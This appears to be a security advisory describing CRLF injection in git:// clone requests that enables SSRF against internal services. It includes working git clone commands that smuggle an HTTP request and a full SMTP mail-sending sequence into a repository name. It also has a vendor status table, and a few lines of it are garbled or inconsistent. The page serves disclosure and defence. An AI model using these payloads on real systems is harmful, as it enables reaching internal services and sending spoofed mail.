Table of Contents
When we connect to a server with
git:// protocol, server, we send an initial request packet that looks something like:
When the repository contains a newline on it, the
git clone command also includes the newline (CR, LF) to the packet.
002egit-upload-pack repo .git\0host=example.com
It looks fine at first sight, but the main problem with this is that it is possible to send packets to other ports to communicate with other protocols, which can lead to possibility of SSRF attack on internal services.
For example, running commands like the following
$ git clone 'git://localhost:1234/%0d%0a%0d%0aGET%20/%20HTTP/1.1 %0d%0aHost:localhost%0d%0a%0d%0a'
will eventually send the following packet to localhost:1234.
0050git-upload-pack / GET / HTTP/1.1 Host:localhost host=localhost:1234
We can somewhat create some sophisticated pro With this way, it is possible to send some SMTP packets like the following code and send e-mails over SMTP protocol.
$ git clone 'git://localhost:25/x%0d%0aHELO%20localhost%0d%0aMAIL%20FROM%3A%3Cpwn@pwn.moe%3E%0d%0aRCPT%20TO%3A%3Cvic@pwn.moe%3E%0d%0aDATA%0d%0aFrom%3A%20%5BHacker%5D%20%3Cpwn@pwn.moe%3E%0d%0aTo%3A%20%3Cvic@pwn.moe%0d%0aDate%3ATue,%2015%20Sep%202017%0aSubject%3A%20Hi%0d%0a.%0d%0aQUIT%0a'
git/git has been fixed appropriately.
Softwares that rely on
git clone may be affected by this vulnerability.
|Product Name||Current Status||Reference|
|Kallithea||Fixed||Release Notes v0.63|
|Gogs||Fixed||Plans to fix in upcoming release (v0.13)|
|BitBucket||Mitigated||Bounty awarded: P3|
|GitHub||Git protocol is not supported|
|Gitee||Port part is filtered, which leads to no impact|
|GitLab||CRLF characters were filtered|